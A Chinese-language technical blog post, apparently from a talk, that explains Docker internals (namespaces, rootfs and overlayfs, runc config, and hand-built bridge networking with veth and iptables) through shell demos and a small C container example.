wywwzjj's Blog

Container (Docker) is Process or Virtual Machine

字数统计: 8.8k阅读时长: 47 min
2022/04/30 Share

Docker 是虚拟机吗?Docker 底层用了哪些关键技术?容器逃逸逃的是什么?

除了回答这些问题,本次分享还会介绍几个 Docker 相关的比较有意思的漏洞,其中包括一个 AWS 安全工程师也会犯的错误。

Docker 本身也比较复杂,很难一次性面面俱到,所以会少讲一点后渗透的利用,专注几个关键技术。

最初接触 Docker 的时候,听到最多的就是 Docker 不是虚拟机。

遇到这种 Ubuntu 的 Docker 镜像更迷惑了,这明明长的差不多,甚至还可以用 apt 装软件,你跟我说这不是虚拟机?

有意思的是,把容器当成虚拟机看待同样可以用的很好,当然这也得益于 docker 本身的良好设计,但是 Docker 容器真的是虚拟机吗?

  • 都是 Ubuntu 的根目录,有什么区别吗?

image-20230212222515465

image-20230212222525593

  • 当任意文件读写入遇上 Container,可以写 crontab 吗?
  • 这两个 sleep 进程有什么区别吗?

pstree -alpTS

image-20230212222606514

image-20230212222620290

  • Docker Engine 是替代了 Hypervisor 这一层吗?是不是用了新的虚拟机技术?

image-20230212222633132

What’s the major problems need to solve?

image-20230212222715807

从这张图可以看到,技术发展到今天,从最开始的自建机房,到云主机,再到现在轻便的 FaaS。

容器技术将虚拟机这个计算单位拆分到了更小的单元。计算资源被不断的抽象成服务,我们的选择也越来越多。

可以专注业务本身,尽量少操心运维层次的东西。

image-20230212222727588

Cloud Native

云原生的生态非常庞大,除了计算、存储、网络三大主题,还覆盖到了方方面面。

今天我们主要关注的是 Container 这一部分,用红框画了一下。

如果大家感兴趣的话,我们后面还可以分享一下 Kubernetes 相关的东西。

The Alternative solutions

Vagrant

https://www.vagrantup.com/

https://github.com/hashicorp/vagrant

Vagrant 是在 2010 年发布的一个构建和管理虚拟机的方案,可以非常轻松的构建一个 workflow。

解决的一个问题是,如何快速创建并配置虚拟机?

image-20230212222815437

他本身不提供虚拟化能力,可以看做是对虚拟化平台的一个封装。

像这个图是 VirtualBox,还支持 VMware、Hyper-V,甚至还融合了 Docker。

配置好环境后,几条命令就可以启动一个虚拟机。

vagrant init ubuntu/focal64  # Ubuntu 20.04 LTS
vagrant up
vagrant ssh
vagrant@vagrant:~$ id
uid=1000(vagrant) gid=1000(vagrant) groups=1000(vagrant),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd),113(lpadmin),114(sambashare)

如果我们需要对内核进行批量测试,相比直接使用 QEMU,这个还是相当方便的。

Select a Box

和 Docker 的镜像非常相似,只需要选择一个自己喜欢的虚拟机,然后在上面进行构建。

https://app.vagrantup.com/boxes/search

image-20230212222914368

当然也可以自己对一个虚拟机进行打包,然后发布到这上面。

Vagrantfile

部署工作的自动化步骤就放在这里,对应 Dockerfile。

以 Kubernetes 集群的部署为例,这里是配了 4 台虚拟机。

https://www.vagrantup.com/docs/vagrantfile/

以 Kubernetes 集群的部署为例

Vagrant.configure("2") do |config|
config.vm.provision :shell, privileged: true, inline: $install_common_tools

config.vm.define :master do |master|
master.vm.provider :virtualbox do |vb|
vb.name = "master"
vb.memory = 2048
vb.cpus = 2
end
master.vm.box = "ubuntu/bionic64"
master.disksize.size = "25GB"
master.vm.hostname = "master"
master.vm.network :private_network, ip: "10.0.0.10"
master.vm.provision :shell, privileged: false, inline: $provision_master_node
end

%w{node1 node2 node3}.each_with_index do |name, i|
config.vm.define name do |node|
node.vm.provider "virtualbox" do |vb|
vb.name = "node#{i + 1}"
vb.memory = 2048
vb.cpus = 2
end
node.vm.box = "ubuntu/bionic64"
node.disksize.size = "25GB"
node.vm.hostname = name
node.vm.network :private_network, ip: "10.0.0.#{i + 11}"
node.vm.provision :shell, privileged: false, inline: <<-SHELL
sudo /vagrant/join.sh
echo 'Environment="KUBELET_EXTRA_ARGS=--node-ip=10.0.0.#{i + 11}"' | sudo tee -a /etc/systemd/system/kubelet.service.d/10-kubeadm.conf
cat /vagrant/id_rsa.pub >> /home/vagrant/.ssh/authorized_keys
sudo systemctl daemon-reload
sudo systemctl restart kubelet
SHELL
end
end
config.vm.provision "shell", inline: $install_multicast
end


$install_common_tools = <<-SCRIPT
...
# Install kubeadm, kubectl and kubelet
export DEBIAN_FRONTEND=noninteractive
apt-get -qq update && apt-get -qq install -y ebtables ethtool docker.io apt-transport-https curl
curl -s https://packages.cloud.google.com/apt/doc/apt-key.gpg | apt-key add -
cat <<EOF >/etc/apt/sources.list.d/kubernetes.list
deb http://apt.kubernetes.io/ kubernetes-xenial main
EOF
SCRIPT
...

Puppet / Chef / Ansible

一些比较流行的自动化运维工具,大多是基于 ssh、winrm 进行运维、部署。

对运维人员非常方便,对渗透人员也很方便。

LXC

Docker 的前身。

https://github.com/lxc/lxc

在 2008 年,Linux 2.6.24 将 cgroups 特性合入了主干。Linux Container 是 Canonical 公司基于 namespace 和 cgroups 等技术,瞄准容器世界而开发的一个项目,目标就是要创造出运行在 Linux 系统中,并且隔离性良好的容器环境。当然它最早也就见于 Ubuntu 操作系统上。

2013 年,在 PyCon 大会上 Docker 正式面世。当时的 Docker 是在 Ubuntu 12.04 上开发实现的,只是基于 LXC 之上的一个工具,屏蔽掉了 LXC 的使用细节(类似于 vagrant 屏蔽了底层虚拟机),让用户可以一句 docker run 命令行便创建出自己的容器环境。

Other

这些是比较流行的自动化运维工具,对运维很方便,内网渗透的时候也很方便。

Docker’s Key Techniques

最左边的这个 Cap 和我们下面将要介绍的 POSIX capabilities 不一样。

image-20230212223029846

The Ideal Versus the Real: Revisiting the History of Virtual Machines and Containers

  • chroot:1979 年,Bell Labs 发布了 chroot syscall。

  • Namespaces:2002 年提出 filesystem namespace,随后一直被扩展和迭代。

  • Seccomp:2006 年合入 Linux Kernel。

  • Cgroups:2006 年左右。

  • LXC:2008 年,利用 cgroups、namespaces 和 capabilities 构建容器。

  • Docker:

    2013 年,推出基于 LXC 的容器管理平台,使得 LXC 更易用。

    2014 年,将 libcontainer(runc 前身)替换掉了 LXC。

    2015 年,将 container runtime(libcontainer)拆分出来作为中立的项目 runc,并推出 OCI。

image-20230212223047568

Docker Architecture

运行 docker run -d ubuntu:20.04 sleep 999999999 之后会发生什么?

image-20230212223120975

image-20230212223126522

image-20230212223138538

Implementing Container Runtime Shim: runc

image-20230212223152894

Namespaces

namespaces(7) - Linux manual page

A namespace wraps a global system resource in an abstraction that makes it appear to the processes within the namespace that they have their own isolated instance of the global resource.

Changes to the global resource are visible to other processes that are members of the namespace, but are invisible to other processes.

One use of namespaces is to implement containers.

Limits what you can see.

Namespace Flag            Isolates
Cgroup CLONE_NEWCGROUP Cgroup root directory
IPC CLONE_NEWIPC System V IPC, POSIX message queues
Network CLONE_NEWNET Network devices, stacks, ports, etc.
Mount CLONE_NEWNS Mount points
PID CLONE_NEWPID Process IDs
Time CLONE_NEWTIME Boot and monotonic clocks
User CLONE_NEWUSER User and group IDs
UTS CLONE_NEWUTS Hostname and NIS domain name

First experience of Namespaces

unshare - run program with some namespaces unshared from parent

➜  ~ id
uid=1000(iubu) gid=1000(iubu) groups=1000(iubu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),134(lxd),135(sambashare),999(docker)

➜ ~ unshare -m -n -p -u -U -r -f --mount-proc bash
root@ubuntu:~# id
uid=0(root) gid=0(root) groups=0(root),65534(nogroup)
root@ubuntu:~# ps -aux
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.2 0.1 19920 5288 pts/2 S 13:33 0:00 bash
root 7 0.0 0.0 21584 3812 pts/2 R+ 13:33 0:00 ps -aux
root@ubuntu:~# hostname whlab && hostname
whlab
root@ubuntu:~# ip link
1: lo: <LOOPBACK> mtu 65536 qdisc noop state DOWN mode DEFAULT group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
root@ubuntu:~# exit
exit
➜ ~ ip link
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP mode DEFAULT group default qlen 1000
link/ether 00:0c:29:d0:43:f7 brd ff:ff:ff:ff:ff:ff
altname enp2s1
➜ ~ hostname
ubuntu
➜  ~ diff <(ls -alh /proc/self/ns | awk '{print $9$10$11}' | uniq) <(sudo ls -lah /proc/`pidof bash`/ns | awk '{print $9$10$11}' | uniq)
< mnt->mnt:[4026531840]
< net->net:[4026531992]
< pid->pid:[4026531836]
< pid_for_children->pid:[4026531836]
---
> mnt->mnt:[4026532654]
> net->net:[4026532661]
> pid->pid:[4026532659]
> pid_for_children->pid:[4026532659]

< user->user:[4026531837]
< uts->uts:[4026531838]
---
> user->user:[4026532653]
> uts->uts:[4026532655]

Namespaces 提供了基本的隔离,每个容器处于都处在不同的 Namespace 下。

Generated

Namespaces system call

  • clone:在创建进程时,可以通过 flags 参数指定需要新建的 Namespace 类型。

    int clone(int (*fn)(void *), void *child_stack, int flags, void *arg);
    // CLONE_NEWCGROUP / CLONE_NEWIPC / CLONE_NEWNET / CLONE_NEWNS/ CLONE_NEWPID
  • setns:让调用进程加入某个已经存在的 Namespace。

    int setns(int fd, int nstype);
  • unshare:将调用进程移动到新的 Namespace 中。

    int unshare(int flags);

C 写一个 Docker 的简易 Demo

Docker基础技术:Linux Namespace(上) | 酷 壳 - CoolShell

#include <sys/types.h>
#include <sys/wait.h>
#include <sys/mount.h>
#include <stdio.h>
#include <sched.h>
#include <signal.h>
#include <unistd.h>

#define STACK_SIZE (1024 * 1024) /* Stack size for cloned child */

static char container_stack[STACK_SIZE];
char *const container_args[] = {
"/bin/bash",
"-l",
NULL
};

int container_main(void *arg) {
printf("Container [%5d] - inside the container!\n", getpid());

//set hostname
sethostname("container", 10);

//remount "/proc" to make sure the "top" and "ps" show container's information
if (mount("proc", "rootfs/proc", "proc", 0, NULL) != 0) {
perror("proc");
}
if (mount("sysfs", "rootfs/sys", "sysfs", 0, NULL) != 0) {
perror("sys");
}
if (mount("none", "rootfs/tmp", "tmpfs", 0, NULL) != 0) {
perror("tmp");
}
if (mount("udev", "rootfs/dev", "devtmpfs", 0, NULL) != 0) {
perror("dev");
}
if (mount("devpts", "rootfs/dev/pts", "devpts", 0, NULL) != 0) {
perror("dev/pts");
}
if (mount("shm", "rootfs/dev/shm", "tmpfs", 0, NULL) != 0) {
perror("dev/shm");
}
if (mount("tmpfs", "rootfs/run", "tmpfs", 0, NULL) != 0) {
perror("run");
}
/*
* 模仿Docker的从外向容器里mount相关的配置文件
* 你可以查看:/var/lib/docker/containers/<container_id>/目录,
* 你会看到docker的这些文件的。
*/
if (mount("conf/hosts", "rootfs/etc/hosts", "none", MS_BIND, NULL) != 0 ||
mount("conf/hostname", "rootfs/etc/hostname", "none", MS_BIND, NULL) != 0 ||
mount("conf/resolv.conf", "rootfs/etc/resolv.conf", "none", MS_BIND, NULL) != 0) {
perror("conf");
}
/* 模仿docker run命令中的 -v, --volume=[] 参数干的事 */
if (mount("/tmp/t1", "rootfs/mnt", "none", MS_BIND, NULL) != 0) {
perror("mnt");
}

/* chroot 隔离目录 */
if (chdir("./rootfs") != 0 || chroot("./") != 0) {
perror("chdir/chroot");
}

execv(container_args[0], container_args);
perror("exec");
printf("Something's wrong!\n");
return 1;
}

int main() {
printf("Parent [%5d] - start a container!\n", getpid());
int container_pid = clone(container_main, container_stack + STACK_SIZE,
CLONE_NEWUTS |
CLONE_NEWIPC |
CLONE_NEWPID |
CLONE_NEWNS |
SIGCHLD, NULL);
waitpid(container_pid, NULL, 0);
printf("Parent - container stopped!\n");
return 0;
}

这些全局资源本来就是操作系统提供的,想给你看就给你看,不想给你看,自然看不着。

用 unshare 立马就能拥有和 docker 类似的体验。

好了,本次分享结束,docker 就这么简单。

实际上的 runc:

image-20230212234744910

nsenter tool

sudo nsenter -t $(sudo docker inspect --format '{{ .State.Pid }}' 09335) -n ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
18: eth0@if19: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:ac:11:00:03 brd ff:ff:ff:ff:ff:ff link-netnsid 0
inet 172.17.0.3/16 brd 172.17.255.255 scope global eth0
valid_lft forever preferred_lft forever


Usage:
nsenter [options] [<program> [<argument>...]]

Run a program with namespaces of other processes.

Options:
-a, --all enter all namespaces (target)
-t, --target <pid> target process to get namespaces from
-m, --mount[=<file>] enter mount namespace
-u, --uts[=<file>] enter UTS namespace (hostname etc)
-i, --ipc[=<file>] enter System V IPC namespace
-n, --net[=<file>] enter network namespace
-p, --pid[=<file>] enter pid namespace
-C, --cgroup[=<file>] enter cgroup namespace
-U, --user[=<file>] enter user namespace
-S, --setuid <uid> set uid in entered namespace
-G, --setgid <gid> set gid in entered namespace
--preserve-credentials do not touch uids or gids
-r, --root[=<dir>] set the root directory
-w, --wd[=<dir>] set the working directory
-F, --no-fork do not fork before execing <program>
-Z, --follow-context set SELinux context according to --target PID

-h, --help display this help
-V, --version display version

File System

rootfs

image-20230212234704806

容器的一个核心作用是打包运行环境,而环境是 Images 提供的,先看一下 Images 的内容:

# https://github.com/containers/skopeo
➜ ~ skopeo copy docker://ubuntu:20.04 oci:ubuntu:20.04

# https://github.com//opencontainers/umoci
➜ ~ umoci unpack --image ubuntu:20.04 ubuntu-bundle

➜ ~ ls -alh ubuntu-bundle
-rw-r--r-- 1 root root 2.9K Apr 25 20:07 config.json
drwxr-xr-x 17 root root 4.0K Dec 31 1969 rootfs
...

# Export a container's filesystem as a tar archive
# mkdir rootfs && docker export $(docker create ubuntu:20.04) | tar -C rootfs -xvf -

如果将容器比作集装箱,那么 config.json 可以看成是这个”集装箱”的规格说明书。

其中 config.json 中关于 file system 的部分:

chroot (pivot_root) + mount

"root": {
"path": "rootfs"
},
"mounts": [
{
"destination": "/proc",
"type": "proc",
"source": "proc"
},
{
"destination": "/dev",
"type": "tmpfs",
"source": "tmpfs",
"options": [
"nosuid",
"strictatime",
"mode=755",
"size=65536k"
]
},
...
{
"destination": "/sys/fs/cgroup",
"type": "cgroup",
"source": "cgroup",
"options": [
"nosuid",
"noexec",
"nodev",
"relatime",
"ro"
]
}
]

rootfs 目录:

➜  ~ ls -alh ubuntu-bundle/rootfs
lrwxrwxrwx 1 root root 7 Apr 15 10:54 bin -> usr/bin
drwxr-xr-x 2 root root 4.0K Apr 15 2020 boot
drwxr-xr-x 2 root root 4.0K Apr 15 10:57 dev
drwxr-xr-x 30 root root 4.0K Apr 15 10:56 etc
drwxr-xr-x 2 root root 4.0K Apr 15 2020 home
lrwxrwxrwx 1 root root 7 Apr 15 10:54 lib -> usr/lib
lrwxrwxrwx 1 root root 9 Apr 15 10:54 lib32 -> usr/lib32
lrwxrwxrwx 1 root root 9 Apr 15 10:54 lib64 -> usr/lib64
lrwxrwxrwx 1 root root 10 Apr 15 10:54 libx32 -> usr/libx32
drwxr-xr-x 2 root root 4.0K Apr 15 10:54 media
drwxr-xr-x 2 root root 4.0K Apr 15 10:54 mnt
drwxr-xr-x 2 root root 4.0K Apr 15 10:54 opt
drwxr-xr-x 2 root root 4.0K Apr 15 2020 proc
drwx------ 2 root root 4.0K Apr 15 10:56 root
drwxr-xr-x 5 root root 4.0K Apr 15 10:57 run
lrwxrwxrwx 1 root root 8 Apr 15 10:54 sbin -> usr/sbin
drwxr-xr-x 2 root root 4.0K Apr 15 10:54 srv
drwxr-xr-x 2 root root 4.0K Apr 15 2020 sys
drwxrwxrwt 2 root root 4.0K Apr 15 10:57 tmp
drwxr-xr-x 13 root root 4.0K Apr 15 10:54 usr
drwxr-xr-x 11 root root 4.0K Apr 15 10:56 var

实际上,为了节省存储空间,还用了一些别的技术,如 Overlayfs。About storage drivers

"GraphDriver": {
"Data": {
"LowerDir": "/var/lib/docker/overlay2/efbb6f6052536b6e193926530488525de1710325166a14a544c38e7bd26bfa63-init/diff:/var/lib/docker/overlay2/356fd2f50cfff3efdd2f04b0aa9e90092d8134dadfbda029bc16eae25d3f9f81/diff",
"MergedDir": "/var/lib/docker/overlay2/efbb6f6052536b6e193926530488525de1710325166a14a544c38e7bd26bfa63/merged",
"UpperDir": "/var/lib/docker/overlay2/efbb6f6052536b6e193926530488525de1710325166a14a544c38e7bd26bfa63/diff",
"WorkDir": "/var/lib/docker/overlay2/efbb6f6052536b6e193926530488525de1710325166a14a544c38e7bd26bfa63/work"
},
"Name": "overlay2"
}
root@69cdae2e90c3:/# mount
overlay on / type overlay (rw,relatime,lowerdir=/var/lib/docker/overlay2/l/I7OJVG6PNZR6XYZMPPC346MA6N:/var/lib/docker/overlay2/l/EEK3WLG3RPSB6CMMDQI6TAKSHS,upperdir=/var/lib/docker/overlay2/efd343546cc3e3dbc17d5c2d9166e475fe7759a487a6150684ac001c7627425e/diff,workdir=/var/lib/docker/overlay2/efd343546cc3e3dbc17d5c2d9166e475fe7759a487a6150684ac001c7627425e/work)

chroot

image-20230212234528666

root@ubuntu:/home/iubu/runc/ubuntu/rootfs# ls
bin boot dev etc home lib lib32 lib64 libx32 media mnt opt proc root run sbin srv sys tmp usr var
root@ubuntu:/home/iubu/runc/ubuntu/rootfs# chroot . bash
root@ubuntu:/# ps
Error, do this: mount -t proc proc /proc
root@ubuntu:/# ls -al /
-rwxr-xr-x 1 1000 1000 0 Apr 28 16:00 .dockerenv
drwxr-xr-x 2 1000 1000 12288 Apr 28 16:00 bin
drwxr-xr-x 2 1000 1000 4096 Apr 28 16:00 boot
drwxr-xr-x 4 1000 1000 4096 Apr 28 16:00 dev
drwxr-xr-x 30 1000 1000 4096 Apr 28 16:00 etc
drwxr-xr-x 2 1000 1000 4096 Apr 28 16:00 home
...
drwxr-xr-x 13 1000 1000 4096 Apr 28 16:00 var

All config in json

docker run -d -v /run/docker/runtime-runc/moby:/exp ubuntu:20.04 sleep inf
af90525455dee4abc8f83085c63224d1a03db89afccaaaf1556857758fdfe290

cat /run/docker/runtime-runc/moby/af90525455dee4abc8f83085c63224d1a03db89afccaaaf1556857758fdfe290/state.json

新版 docker 的目录改到 /run/containerd/io.containerd.runtime.v2.task/moby/

image-20230212234436041

Docker 的 volume -v /host:/xxx 是怎么实现的?还是 mount,mount –bind。

image-20230212234413099

Networking

对渗透选手来说,网络环境更加敏感,单独拎出来聊聊。

几个问题:

  • 容器之间怎么通信?
  • 容器怎么和 Host 进行通信?
  • 容器怎么联通的外网?
  • 容器之间如何实现跨主机通信? 见 Kubernetes 篇。

Docker 提供了几种网络模式,下面重点介绍默认的 bridge 模式。

  • bridge (default)
  • host: the container shares the host’s networking namespace
  • none: disable all networking

Network Namespace in Action

如果在已经装了 docker 的机器上做实验会有冲突,因为 docker 的网桥也是叫 docker0.

image-20230212233954906

Veth

Virtual Ethernet Device,虚拟网卡对,主要用于跨 Network Namespace 通信。

可以看成一对用网线连接的网卡,向其中一端发的数据,会立即传到另一端。

# 创建一对 veth
ip link add <p1-name> type veth peer name <p2-name>
# 设置 Network Namespace
ip link add <p1-name> netns <p1-ns> type veth peer <p2-name> netns <p2-ns>

• Bridge

Ethernet Bridge Device,虚拟交换机,还可以作为网关进行转发。

ip-link - network device configuration

Introduction to Linux interfaces for virtual networking | Red Hat Developer

bridge - Ethernet Bridge device
...
veth - Virtual ethernet interface
vlan - 802.1q tagged virtual LAN interface
vxlan - Virtual eXtended LAN
ip6tnl - Virtual tunnel interface IPv4|IPv6 over IPv6
ipip - Virtual tunnel interface IPv4 over IPv4
sit - Virtual tunnel interface IPv6 over IPv4
gre - Virtual tunnel interface GRE over IPv4
...

自己动手,构建一个如上图的简易网络环境:

# 创建一个 net namespace
➜ ~ ip netns add docker1
➜ ~ ip netns list
docker1
➜ ~ l /run/netns
-r--r--r-- 1 root root 0 Apr 26 05:33 docker1
➜ ~ mount | grep netns
tmpfs on /run/netns type tmpfs (rw,nosuid,nodev,noexec,relatime,size=399468k,mode=755)
nsfs on /run/netns/docker1 type nsfs (rw)
nsfs on /run/netns/docker1 type nsfs (rw)

# 新建的 netns 默认有一个 lo
➜ ~ ip netns exec docker1 ip a
1: lo: <LOOPBACK> mtu 65536 qdisc noop state DOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
➜ ~ ip netns exec docker1 ip link set dev lo up # 可省略
➜ ~ ip netns exec docker1 ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever


# 创建一对虚拟网卡
➜ ~ ip link add bridge-veth1 type veth peer name veth1
➜ ~ ip link
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP mode DEFAULT group default qlen 1000
link/ether 00:0c:29:c2:f4:77 brd ff:ff:ff:ff:ff:ff
3: veth1@bridge-veth1: <BROADCAST,MULTICAST,M-DOWN> mtu 1500 qdisc noop state DOWN mode DEFAULT group default qlen 1000
link/ether aa:29:f4:e8:ed:d6 brd ff:ff:ff:ff:ff:ff
4: bridge-veth1@veth1: <BROADCAST,MULTICAST,M-DOWN> mtu 1500 qdisc noop state DOWN mode DEFAULT group default qlen 1000
link/ether 4e:d1:a9:86:2f:32 brd ff:ff:ff:ff:ff:ff


# 将 veth 的一端 veth1 放入 docker1 ns 中
➜ ~ ip link set veth1 netns docker1
➜ ~ ip link
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP mode DEFAULT group default qlen 1000
link/ether 00:0c:29:c2:f4:77 brd ff:ff:ff:ff:ff:ff
4: bridge-veth1@if3: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN mode DEFAULT group default qlen 1000
link/ether 4e:d1:a9:86:2f:32 brd ff:ff:ff:ff:ff:ff link-netns docker1
# 可看到 veth1 已出现在 docker1 中
➜ ~ ip netns exec docker1 ip link
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
3: veth1@if4: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN mode DEFAULT group default qlen 1000
link/ether a2:c9:82:eb:67:cb brd ff:ff:ff:ff:ff:ff link-netnsid 0


# 将 veth1 改个名字 eth0,并设置 IP 地址
➜ ~ ip netns exec docker1 ip link set dev veth1 name eth0
➜ ~ ip netns exec docker1 ip addr add 10.0.0.11/24 dev eth0
➜ ~ ip netns exec docker1 ip link set eth0 up
➜ ~ ip link set bridge-veth1 up
➜ ~ ip netns exec docker1 ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
3: eth0@if4: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default qlen 1000
link/ether be:d0:48:d1:39:bf brd ff:ff:ff:ff:ff:ff link-netnsid 0
inet 10.0.0.11/24 scope global eth0
valid_lft forever preferred_lft forever
inet6 fe80::bcd0:48ff:fed1:39bf/64 scope link
valid_lft forever preferred_lft forever

同理再设置一个 docker2:

ip netns add docker2
ip netns exec docker2 ip link set dev lo up
ip link add bridge-veth2 type veth peer name veth2 netns docker2
ip netns exec docker2 ip link set dev veth2 name eth0
ip netns exec docker2 ip addr add 10.0.0.12/24 dev eth0
ip netns exec docker2 ip link set eth0 up
ip link set dev bridge-veth2 up


➜ ~ ip link
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP mode DEFAULT group default qlen 1000
link/ether 00:0c:29:c2:f4:77 brd ff:ff:ff:ff:ff:ff
4: bridge-veth1@if3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP mode DEFAULT group default qlen 1000
link/ether 4e:d1:a9:86:2f:32 brd ff:ff:ff:ff:ff:ff link-netns docker1
5: bridge-veth2@if2: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP mode DEFAULT group default qlen 1000
link/ether 62:7d:2f:b1:cb:45 brd ff:ff:ff:ff:ff:ff link-netns docker2

添加一个网桥,即 docker0 部分:

➜  ~ ip link add docker0 type bridge
➜ ~ ip link set docker0 up

# 将 bridge-veth1、bridge-veth2 接到网桥上
➜ ~ ip link set bridge-veth1 master docker0
➜ ~ ip link set bridge-veth2 master docker0

# 查看网桥接了哪些网卡
➜ ~ ip link show master docker0

当前网络地址:

➜  ~ ip -all netns exec ip a
netns: docker2
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0@if5: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default qlen 1000
link/ether 86:61:6b:7c:cf:50 brd ff:ff:ff:ff:ff:ff link-netnsid 0
inet 10.0.0.12/24 scope global eth0
valid_lft forever preferred_lft forever
inet6 fe80::8461:6bff:fe7c:cf50/64 scope link
valid_lft forever preferred_lft forever

netns: docker1
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
3: eth0@if4: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default qlen 1000
link/ether aa:29:f4:e8:ed:d6 brd ff:ff:ff:ff:ff:ff link-netnsid 0
inet 10.0.0.11/24 scope global eth0
valid_lft forever preferred_lft forever
inet6 fe80::a829:f4ff:fee8:edd6/64 scope link
valid_lft forever preferred_lft forever

docker1、docker2 实现互通:

➜  ~ ip -all netns exec ping -c 1 10.0.0.12    
netns: docker2
PING 10.0.0.12 (10.0.0.12) 56(84) bytes of data.
64 bytes from 10.0.0.12: icmp_seq=1 ttl=64 time=0.023 ms

--- 10.0.0.12 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.023/0.023/0.023/0.000 ms

netns: docker1
PING 10.0.0.12 (10.0.0.12) 56(84) bytes of data.
64 bytes from 10.0.0.12: icmp_seq=1 ttl=64 time=0.029 ms

--- 10.0.0.12 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.029/0.029/0.029/0.000 ms


➜ ~ ip -all netns exec ping -c 1 10.0.0.11
netns: docker2
PING 10.0.0.11 (10.0.0.11) 56(84) bytes of data.
64 bytes from 10.0.0.11: icmp_seq=1 ttl=64 time=0.039 ms

--- 10.0.0.11 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.039/0.039/0.039/0.000 ms

netns: docker1
PING 10.0.0.11 (10.0.0.11) 56(84) bytes of data.
64 bytes from 10.0.0.11: icmp_seq=1 ttl=64 time=0.020 ms

--- 10.0.0.11 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.020/0.020/0.020/0.000 ms

还是不通外网:

➜  ~ ip netns exec docker1 ping -c 1 1.1.1.1  
ping: connect: Network is unreachable

还差关键一步,设置转发:

➜  ~ ip addr add 10.0.0.1/24 dev docker0

# 添加一个路由,默认全部走网桥上
➜ ~ ip -all netns exec ip route add default via 10.0.0.1
➜ ~ ip -all netns exec ip route
netns: docker2
default via 10.0.0.1 dev eth0
10.0.0.0/24 dev eth0 proto kernel scope link src 10.0.0.12

netns: docker1
default via 10.0.0.1 dev eth0
10.0.0.0/24 dev eth0 proto kernel scope link src 10.0.0.11


# 设置转发
➜ ~ sysctl -w net.ipv4.ip_forward=1
➜ ~ iptables -t nat -A POSTROUTING -s 10.0.0.1/24 -j MASQUERADE

成功通外网:

➜  ~ ip -all netns exec ping -c 1 1.1.1.1
netns: docker2
PING 1.1.1.1 (1.1.1.1) 56(84) bytes of data.
64 bytes from 1.1.1.1: icmp_seq=1 ttl=127 time=132 ms

--- 1.1.1.1 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 132.465/132.465/132.465/0.000 ms

netns: docker1
PING 1.1.1.1 (1.1.1.1) 56(84) bytes of data.
